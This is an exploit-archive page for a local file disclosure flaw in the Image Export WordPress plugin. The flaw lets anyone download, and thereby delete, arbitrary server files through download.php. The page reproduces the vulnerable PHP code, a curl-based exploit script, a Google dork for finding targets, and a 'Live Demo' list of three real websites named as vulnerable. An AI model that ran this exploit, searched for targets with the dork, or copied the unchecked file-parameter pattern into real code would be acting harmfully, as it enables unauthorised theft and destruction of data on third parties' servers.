Home / os / win10

Image Export WordPress Plugin - Local File Disclosure

Posted on 30 November -0001

<HTML><HEAD><TITLE>Image Export WordPress Plugin - Local File Disclosure</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>" Image Export WordPress Plugin - Local File Disclosure "


in this bug , Attcker is able to download the files on the server and just after the download process file are deleted from the server.


Source : https://github.com/wp-plugins/image-export



===========
Vulnerable page :
===========
image-export/download.php


==========
Vulnerable Code :
==========
<?php
if ( isset( $_REQUEST['file'] ) && !empty( $_REQUEST['file'] ) ) {
	$file = $_GET['file'];
	header( 'Content-Type: application/zip' );
	header( 'Content-Disposition: attachment; filename="' . $file . '"' );
	readfile( $file );
	unlink( $file );
	
	exit;
}
?>


=========
Exploit :
=========
<?php
# Author : Shahab Shamsi
# Title : Image Explort WordPress Plugin - Local File Disclosure
# Version : All Version
# Google Dork : inurl:/wp-content/plugins/image-export/
# Date  : 09.September.2016
# Email : info@securityman.org
# Vendor : https://github.com/wp-plugins/image-export
# Category : Webapps
$target = $argv[1];
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_URL, "http://localhost/wp-content/plugins/image-export/download.php?file=image-export.php");
curl_setopt($ch, CURLOPT_HTTPGET, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3);
curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_$target");
$buf = curl_exec ($ch);
curl_close($ch);
unset($ch);
echo $buf;
/*
Contact Me :
Telegram : @R4DIK4L
Email : info@securityman.org
WebSilte : WwW.MohitAmn.Org
Tnx : AmirHossein Farjad
Tnx : Sadegh Safaeian
Curl By : R@DIK@L
*/
?> 



============
Live Demo :
============
http://www.c3inmobiliaria.es/wp-content/plugins/image-export/download.php
https://www.123ehost.com/wp-content/plugins/image-export/download.php
http://www.barankhabar.ir/wp-content/plugins/image-export-master/download.php

</BODY></HTML>

 

TOP

Malware :

Exploits :